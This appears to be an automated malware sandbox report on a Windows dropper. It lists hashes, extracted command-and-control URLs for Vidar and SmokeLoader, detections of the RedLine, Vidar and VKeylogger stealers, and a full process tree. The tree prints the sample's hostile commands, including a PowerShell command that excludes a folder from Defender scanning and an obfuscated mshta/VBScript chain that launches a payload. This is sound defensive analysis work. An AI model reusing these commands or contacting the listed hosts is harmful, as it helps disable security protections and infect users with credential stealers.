Analysis
-
max time kernel
6s -
max time network
154s -
platform
windows10_x64 -
resource
win10-en -
submitted
05-09-2021 01:16
Static task
static1
Behavioral task
behavioral1
Sample
A75FFC6AB58574119E960EC0B1F72BFD.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
A75FFC6AB58574119E960EC0B1F72BFD.exe
Resource
win10-en
General
-
Target
A75FFC6AB58574119E960EC0B1F72BFD.exe
-
Size
3.0MB
-
MD5
a75ffc6ab58574119e960ec0b1f72bfd
-
SHA1
f7addaaf851436721919294927253726b67ce17b
-
SHA256
8303c9a626d7edb090bdd8f0d128fc887b7fa36b0dfc43a7f71dcb5b34b1bbab
-
SHA512
09520fdf40a16790b93b4ef14a0b177bd65956712d874d782c3b902f9a42869d3691aaf6d038468350b0bdc159c6cf376da94af580c4aa6f48250a7e60b99c5d
Malware Config
Extracted
http://shellloader.com/welcome
Extracted
vidar
40.3
706
https://lenko349.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3388 4268 rundll32.exe 24 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
resource yara_rule behavioral2/memory/4232-263-0x0000000002940000-0x000000000296E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
VKeylogger
A keylogger first seen in Nov 2020.
-
VKeylogger Payload 2 IoCs
resource yara_rule behavioral2/memory/924-437-0x00000000001E0000-0x00000000001EE000-memory.dmp family_vkeylogger behavioral2/memory/924-466-0x0000000000400000-0x0000000002CBE000-memory.dmp family_vkeylogger -
Vidar Stealer 3 IoCs
resource yara_rule behavioral2/memory/3196-295-0x0000000003E90000-0x0000000003F63000-memory.dmp family_vidar behavioral2/memory/3196-293-0x0000000000400000-0x00000000021DA000-memory.dmp family_vidar behavioral2/memory/4360-470-0x0000000002D20000-0x0000000002DF3000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x000300000001aa51-120.dat aspack_v212_v242 behavioral2/files/0x000300000001aa51-122.dat aspack_v212_v242 behavioral2/files/0x000400000001aae4-123.dat aspack_v212_v242 behavioral2/files/0x000400000001aae6-126.dat aspack_v212_v242 behavioral2/files/0x000400000001aae6-127.dat aspack_v212_v242 behavioral2/files/0x000400000001aae4-119.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 11 IoCs
pid Process 2272 setup_install.exe 3196 Wed065721111fbde.exe 2776 Wed069ea7b9fa22d66d.exe 4608 Wed06c0310f7c9.exe 4580 Wed06bee4c0f9.exe 4612 Wed068238a49b99.exe 4588 Wed062611295f.exe 604 Wed0677c055f84f3.exe 224 Wed0660009604.exe 1144 Wed0660009604.tmp 1464 Wed069ea7b9fa22d66d.exe -
Loads dropped DLL 6 IoCs
pid Process 2272 setup_install.exe 2272 setup_install.exe 2272 setup_install.exe 2272 setup_install.exe 2272 setup_install.exe 1144 Wed0660009604.tmp -
resource yara_rule behavioral2/files/0x000400000001ab07-264.dat themida behavioral2/memory/3544-314-0x0000000000170000-0x0000000000171000-memory.dmp themida behavioral2/files/0x000400000001ab07-266.dat themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com 36 ipinfo.io 37 ipinfo.io 203 ipinfo.io 204 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 38 IoCs
pid pid_target Process procid_target 5232 4184 WerFault.exe 106 5244 3196 WerFault.exe 85 5728 4184 WerFault.exe 106 5780 3196 WerFault.exe 85 6020 4184 WerFault.exe 106 6068 3196 WerFault.exe 85 5224 3196 WerFault.exe 85 5384 4184 WerFault.exe 106 4676 3196 WerFault.exe 85 4552 4184 WerFault.exe 106 6012 3196 WerFault.exe 85 4448 4184 WerFault.exe 106 2300 4184 WerFault.exe 106 4700 3196 WerFault.exe 85 4532 1196 WerFault.exe 137 5124 6088 WerFault.exe 141 1028 3196 WerFault.exe 85 5892 1196 WerFault.exe 137 1040 6088 WerFault.exe 141 6280 1196 WerFault.exe 137 6664 6088 WerFault.exe 141 6248 6088 WerFault.exe 141 6460 3196 WerFault.exe 85 7008 1552 WerFault.exe 184 1700 1552 WerFault.exe 184 7412 1552 WerFault.exe 184 7848 1196 WerFault.exe 137 5648 1552 WerFault.exe 184 7392 1196 WerFault.exe 137 8488 3196 WerFault.exe 85 8916 1196 WerFault.exe 137 9112 1552 WerFault.exe 184 9148 3196 WerFault.exe 85 8300 6088 WerFault.exe 141 9204 3196 WerFault.exe 85 8208 6088 WerFault.exe 141 8452 3196 WerFault.exe 85 9096 6088 WerFault.exe 141 -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7224 schtasks.exe 8568 schtasks.exe 8220 schtasks.exe 8980 schtasks.exe -
Kills process with taskkill 1 IoCs
pid Process 8508 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4368 powershell.exe 4368 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 604 Wed0677c055f84f3.exe Token: SeDebugPrivilege 4608 Wed06c0310f7c9.exe Token: SeDebugPrivilege 4368 powershell.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 4640 wrote to memory of 2272 4640 A75FFC6AB58574119E960EC0B1F72BFD.exe 75 PID 4640 wrote to memory of 2272 4640 A75FFC6AB58574119E960EC0B1F72BFD.exe 75 PID 4640 wrote to memory of 2272 4640 A75FFC6AB58574119E960EC0B1F72BFD.exe 75 PID 2272 wrote to memory of 772 2272 setup_install.exe 79 PID 2272 wrote to memory of 772 2272 setup_install.exe 79 PID 2272 wrote to memory of 772 2272 setup_install.exe 79 PID 2272 wrote to memory of 1716 2272 setup_install.exe 80 PID 2272 wrote to memory of 1716 2272 setup_install.exe 80 PID 2272 wrote to memory of 1716 2272 setup_install.exe 80 PID 2272 wrote to memory of 4384 2272 setup_install.exe 81 PID 2272 wrote to memory of 4384 2272 setup_install.exe 81 PID 2272 wrote to memory of 4384 2272 setup_install.exe 81 PID 2272 wrote to memory of 4460 2272 setup_install.exe 82 PID 2272 wrote to memory of 4460 2272 setup_install.exe 82 PID 2272 wrote to memory of 4460 2272 setup_install.exe 82 PID 2272 wrote to memory of 4372 2272 setup_install.exe 83 PID 2272 wrote to memory of 4372 2272 setup_install.exe 83 PID 2272 wrote to memory of 4372 2272 setup_install.exe 83 PID 772 wrote to memory of 4368 772 cmd.exe 88 PID 772 wrote to memory of 4368 772 cmd.exe 88 PID 772 wrote to memory of 4368 772 cmd.exe 88 PID 2272 wrote to memory of 4340 2272 setup_install.exe 84 PID 2272 wrote to memory of 4340 2272 setup_install.exe 84 PID 2272 wrote to memory of 4340 2272 setup_install.exe 84 PID 2272 wrote to memory of 4428 2272 setup_install.exe 87 PID 2272 wrote to memory of 4428 2272 setup_install.exe 87 PID 2272 wrote to memory of 4428 2272 setup_install.exe 87 PID 4372 wrote to memory of 3196 4372 cmd.exe 85 PID 4372 wrote to memory of 3196 4372 cmd.exe 85 PID 4372 wrote to memory of 3196 4372 cmd.exe 85 PID 2272 wrote to memory of 3268 2272 setup_install.exe 86 PID 2272 wrote to memory of 3268 2272 setup_install.exe 86 PID 2272 wrote to memory of 3268 2272 setup_install.exe 86 PID 2272 wrote to memory of 4536 2272 setup_install.exe 96 PID 2272 wrote to memory of 4536 2272 setup_install.exe 96 PID 2272 wrote to memory of 4536 2272 setup_install.exe 96 PID 1716 wrote to memory of 2776 1716 cmd.exe 89 PID 1716 wrote to memory of 2776 1716 cmd.exe 89 PID 1716 wrote to memory of 2776 1716 cmd.exe 89 PID 3268 wrote to memory of 4608 3268 cmd.exe 90 PID 3268 wrote to memory of 4608 3268 cmd.exe 90 PID 4460 wrote to memory of 4612 4460 cmd.exe 94 PID 4460 wrote to memory of 4612 4460 cmd.exe 94 PID 4428 wrote to memory of 4580 4428 cmd.exe 95 PID 4428 wrote to memory of 4580 4428 cmd.exe 95 PID 4428 wrote to memory of 4580 4428 cmd.exe 95 PID 4384 wrote to memory of 4588 4384 cmd.exe 93 PID 4384 wrote to memory of 4588 4384 cmd.exe 93 PID 4384 wrote to memory of 4588 4384 cmd.exe 93 PID 4536 wrote to memory of 604 4536 cmd.exe 92 PID 4536 wrote to memory of 604 4536 cmd.exe 92 PID 4340 wrote to memory of 224 4340 cmd.exe 91 PID 4340 wrote to memory of 224 4340 cmd.exe 91 PID 4340 wrote to memory of 224 4340 cmd.exe 91 PID 224 wrote to memory of 1144 224 Wed0660009604.exe 97 PID 224 wrote to memory of 1144 224 Wed0660009604.exe 97 PID 224 wrote to memory of 1144 224 Wed0660009604.exe 97 PID 2776 wrote to memory of 1464 2776 Wed069ea7b9fa22d66d.exe 98 PID 2776 wrote to memory of 1464 2776 Wed069ea7b9fa22d66d.exe 98 PID 2776 wrote to memory of 1464 2776 Wed069ea7b9fa22d66d.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\A75FFC6AB58574119E960EC0B1F72BFD.exe"C:\Users\Admin\AppData\Local\Temp\A75FFC6AB58574119E960EC0B1F72BFD.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4640 -
C:\Users\Admin\AppData\Local\Temp\7zS022FB583\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS022FB583\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4368
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed069ea7b9fa22d66d.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Users\Admin\AppData\Local\Temp\7zS022FB583\Wed069ea7b9fa22d66d.exeWed069ea7b9fa22d66d.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\7zS022FB583\Wed069ea7b9fa22d66d.exe"C:\Users\Admin\AppData\Local\Temp\7zS022FB583\Wed069ea7b9fa22d66d.exe" -u5⤵
- Executes dropped EXE
PID:1464
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed062611295f.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Users\Admin\AppData\Local\Temp\7zS022FB583\Wed062611295f.exeWed062611295f.exe4⤵
- Executes dropped EXE
PID:4588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed068238a49b99.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Users\Admin\AppData\Local\Temp\7zS022FB583\Wed068238a49b99.exeWed068238a49b99.exe4⤵
- Executes dropped EXE
PID:4612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed065721111fbde.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Users\Admin\AppData\Local\Temp\7zS022FB583\Wed065721111fbde.exeWed065721111fbde.exe4⤵
- Executes dropped EXE
PID:3196 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 7645⤵
- Program crash
PID:5244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 7885⤵
- Program crash
PID:5780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 8605⤵
- Program crash
PID:6068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 7685⤵
- Program crash
PID:5224
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 9605⤵
- Program crash
PID:4676
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 9885⤵
- Program crash
PID:6012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 13925⤵
- Program crash
PID:4700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 14805⤵
- Program crash
PID:1028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 15565⤵
- Program crash
PID:6460
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 16805⤵
- Program crash
PID:8488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 17565⤵
- Program crash
PID:9148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 17965⤵
- Program crash
PID:9204
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 16325⤵
- Program crash
PID:8452
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0660009604.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Users\Admin\AppData\Local\Temp\7zS022FB583\Wed0660009604.exeWed0660009604.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Users\Admin\AppData\Local\Temp\is-2SQMV.tmp\Wed0660009604.tmp"C:\Users\Admin\AppData\Local\Temp\is-2SQMV.tmp\Wed0660009604.tmp" /SL5="$20086,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS022FB583\Wed0660009604.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1144
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed06c0310f7c9.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3268 -
C:\Users\Admin\AppData\Local\Temp\7zS022FB583\Wed06c0310f7c9.exeWed06c0310f7c9.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4608 -
C:\Users\Admin\AppData\Roaming\1158009.exe"C:\Users\Admin\AppData\Roaming\1158009.exe"5⤵PID:3900
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"6⤵PID:760
-
-
-
C:\Users\Admin\AppData\Roaming\4002034.exe"C:\Users\Admin\AppData\Roaming\4002034.exe"5⤵PID:4232
-
-
C:\Users\Admin\AppData\Roaming\3645108.exe"C:\Users\Admin\AppData\Roaming\3645108.exe"5⤵PID:4576
-
-
C:\Users\Admin\AppData\Roaming\8661304.exe"C:\Users\Admin\AppData\Roaming\8661304.exe"5⤵PID:3544
-
-
C:\Users\Admin\AppData\Roaming\7901879.exe"C:\Users\Admin\AppData\Roaming\7901879.exe"5⤵PID:1192
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed06bee4c0f9.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4428 -
C:\Users\Admin\AppData\Local\Temp\7zS022FB583\Wed06bee4c0f9.exeWed06bee4c0f9.exe4⤵
- Executes dropped EXE
PID:4580 -
C:\Users\Admin\Documents\W2xoXqCpLjZ7Gwi5_b92kuKc.exe"C:\Users\Admin\Documents\W2xoXqCpLjZ7Gwi5_b92kuKc.exe"5⤵PID:4360
-
-
C:\Users\Admin\Documents\Ftg2bOvp3R4TYlCKXE6LsIU3.exe"C:\Users\Admin\Documents\Ftg2bOvp3R4TYlCKXE6LsIU3.exe"5⤵PID:1196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 6606⤵
- Program crash
PID:4532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 6726⤵
- Program crash
PID:5892
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 7086⤵
- Program crash
PID:6280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 8526⤵
- Program crash
PID:7848
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 11286⤵
- Program crash
PID:7392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 11206⤵
- Program crash
PID:8916
-
-
-
C:\Users\Admin\Documents\MdYZXFnuwlqH2GnwN8fI_PQj.exe"C:\Users\Admin\Documents\MdYZXFnuwlqH2GnwN8fI_PQj.exe"5⤵PID:5620
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\MdYZXFnuwlqH2GnwN8fI_PQj.exe"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """"== """" for %A IN (""C:\Users\Admin\Documents\MdYZXFnuwlqH2GnwN8fI_PQj.exe"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )6⤵PID:600
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\MdYZXFnuwlqH2GnwN8fI_PQj.exe"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if ""== "" for %A IN ("C:\Users\Admin\Documents\MdYZXFnuwlqH2GnwN8fI_PQj.exe" ) do taskkill /f -im "%~nxA"7⤵PID:7500
-
C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXEX4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV8⤵PID:9120
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL").Run( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV ""== """" for %A IN (""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0, trUE ) )9⤵PID:8080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE&& StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV &if "-PXPoqL0iOUHHP7hXFattB5ZvsV "== "" for %A IN ("C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"10⤵PID:8340
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f -im "MdYZXFnuwlqH2GnwN8fI_PQj.exe"8⤵
- Kills process with taskkill
PID:8508
-
-
-
-
-
C:\Users\Admin\Documents\JZR1VjpZLuw6ycYRRnELJBjC.exe"C:\Users\Admin\Documents\JZR1VjpZLuw6ycYRRnELJBjC.exe"5⤵PID:5772
-
C:\Users\Admin\Documents\JZR1VjpZLuw6ycYRRnELJBjC.exe"C:\Users\Admin\Documents\JZR1VjpZLuw6ycYRRnELJBjC.exe"6⤵PID:6228
-
-
-
C:\Users\Admin\Documents\XeesWuo0V7w3ZrzBMogwPk7G.exe"C:\Users\Admin\Documents\XeesWuo0V7w3ZrzBMogwPk7G.exe"5⤵PID:6088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 6606⤵
- Program crash
PID:5124
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 6806⤵
- Program crash
PID:1040
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 6366⤵
- Program crash
PID:6664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 6566⤵
- Program crash
PID:6248
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 11246⤵
- Program crash
PID:8300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 11126⤵
- Program crash
PID:8208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6088 -s 12166⤵
- Program crash
PID:9096
-
-
-
C:\Users\Admin\Documents\Q86R8noGX3Wq9jQKt7odgNqv.exe"C:\Users\Admin\Documents\Q86R8noGX3Wq9jQKt7odgNqv.exe"5⤵PID:5736
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"6⤵PID:6420
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"6⤵PID:6492
-
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"6⤵PID:6536
-
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe"C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe"5⤵PID:5808
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:6116
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:4028
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:6576
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:7080
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:5400
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:6580
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:1772
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:7520
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:5216
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:7656
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:8772
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:5856
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:8996
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:8500
-
-
C:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exeC:\Users\Admin\Documents\fymK0iI2baiHucBKjMCDv_tQ.exe6⤵PID:8532
-
-
-
C:\Users\Admin\Documents\M4DkjPvtzLc6ASG6syMcWp_w.exe"C:\Users\Admin\Documents\M4DkjPvtzLc6ASG6syMcWp_w.exe"5⤵PID:5704
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\DPRwKy.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\DPRwKy.exe"6⤵PID:5136
-
-
-
C:\Users\Admin\Documents\8m1QzhPHpcYWOpaHLJmKJcWG.exe"C:\Users\Admin\Documents\8m1QzhPHpcYWOpaHLJmKJcWG.exe"5⤵PID:5776
-
-
C:\Users\Admin\Documents\fmJSM6WzTdsu7b9yu33k_SK0.exe"C:\Users\Admin\Documents\fmJSM6WzTdsu7b9yu33k_SK0.exe"5⤵PID:3316
-
-
C:\Users\Admin\Documents\K30W3lXExajABd07YdN5Ezej.exe"C:\Users\Admin\Documents\K30W3lXExajABd07YdN5Ezej.exe"5⤵PID:924
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"6⤵PID:5212
-
-
-
C:\Users\Admin\Documents\c8P8eDJEgree8cYP5IX9jFjR.exe"C:\Users\Admin\Documents\c8P8eDJEgree8cYP5IX9jFjR.exe"5⤵PID:6068
-
-
C:\Users\Admin\Documents\O1Ap6H6UgMWCBWnIyJmHSQ1K.exe"C:\Users\Admin\Documents\O1Ap6H6UgMWCBWnIyJmHSQ1K.exe"5⤵PID:2172
-
-
C:\Users\Admin\Documents\1g0g0HoK4LmlxaWkYs39P3Nf.exe"C:\Users\Admin\Documents\1g0g0HoK4LmlxaWkYs39P3Nf.exe"5⤵PID:1544
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe"C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe"5⤵PID:3268
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:4676
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:2860
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:6436
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:7044
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:2144
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:6156
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:5452
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:7488
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:8168
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:7228
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:8712
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:7848
-
-
C:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exeC:\Users\Admin\Documents\z00IBSbpXzzG3LIIiO2XAxR6.exe6⤵PID:8960
-
-
